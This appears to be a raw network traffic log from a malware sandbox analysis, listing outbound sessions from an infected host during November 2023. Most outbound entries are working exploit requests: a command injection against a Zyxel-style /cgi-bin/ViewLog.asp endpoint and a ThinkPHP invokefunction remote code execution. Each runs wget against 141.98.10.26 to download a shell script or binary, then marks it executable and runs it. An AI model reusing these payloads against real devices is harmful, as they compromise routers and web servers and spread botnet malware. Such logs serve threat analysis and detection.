Nov 22, 2023 08:40:21.925956011 CET	18432	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
929	192.168.2.23	52198	94.121.23.87	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:22.153287888 CET	18435	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
930	192.168.2.23	47992	95.86.87.29	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:22.161871910 CET	18435	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
931	192.168.2.23	41860	62.133.13.218	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:22.815608025 CET	18537	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:23.998403072 CET	18590	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:25.374068022 CET	18881	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:28.157782078 CET	19142	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:33.788997889 CET	19725	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:44.795499086 CET	19768	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:41:08.344208956 CET	19782	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
932	192.168.2.23	42280	94.122.88.52	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:22.817679882 CET	18537	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
933	192.168.2.23	54328	95.140.195.6	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:23.307336092 CET	18562	IN	Data Raw: 72 63 74 63 70 6f Data Ascii: rctcpo

Session ID	Source IP	Source Port	Destination IP	Destination Port
934	192.168.2.23	33584	154.194.135.14	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:23.410440922 CET	18563	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 36 3a 33 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:36:32Auth Result: .
Nov 22, 2023 08:40:23.722281933 CET	18589	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 36 3a 33 32 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:36:32Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
935	192.168.2.23	33590	154.194.135.14	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:24.072190046 CET	18591	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 36 3a 33 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:36:33Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
936	192.168.2.23	34180	95.101.142.64	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:24.286994934 CET	18704	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:24.482465982 CET	18712	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:24 GMT Date: Wed, 22 Nov 2023 07:40:24 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 63 38 65 36 35 35 66 26 23 34 36 3b 31 37 30 30 36 33 38 38 32 34 26 23 34 36 3b 32 30 34 33 34 34 39 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.3c8e655f.1700638824.20434497</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
937	192.168.2.23	48812	95.101.214.81	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:24.287062883 CET	18705	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:24.485371113 CET	18713	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:40:24 GMT Date: Wed, 22 Nov 2023 07:40:24 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 63 66 32 36 34 35 66 26 23 34 36 3b 31 37 30 30 36 33 38 38 32 34 26 23 34 36 3b 64 32 61 39 33 66 37 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.ccf2645f.1700638824.d2a93f7</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
938	192.168.2.23	47172	95.101.50.118	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:24.376456976 CET	18708	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:24.670155048 CET	18717	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:40:24 GMT Date: Wed, 22 Nov 2023 07:40:24 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 37 66 35 37 34 36 38 26 23 34 36 3b 31 37 30 30 36 33 38 38 32 34 26 23 34 36 3b 31 32 63 38 39 38 35 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.77f57468.1700638824.12c89859</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
939	192.168.2.23	33652	95.111.195.113	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:24.427412987 CET	18710	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:24.776654959 CET	18720	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:40:24 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
940	192.168.2.23	44060	95.216.140.98	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:24.481678009 CET	18712	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:24.676048994 CET	18718	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.1 Date: Wed, 22 Nov 2023 07:40:24 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
941	192.168.2.23	49680	88.198.184.162	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:24.670382023 CET	18717	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:24.860586882 CET	18721	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:40:24 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
942	192.168.2.23	33602	154.194.135.14	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:24.724351883 CET	18719	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 36 3a 33 33 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:36:33Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
943	192.168.2.23	40488	88.86.202.32	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:24.899262905 CET	18722	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:25.133796930 CET	18724	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:40:25 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
944	192.168.2.23	52576	88.204.201.42	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:24.948791981 CET	18723	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:25.233213902 CET	18795	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:40:25 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
945	192.168.2.23	58456	31.136.137.22	8080

Timestamp	kBytes transferred	Direction	Data
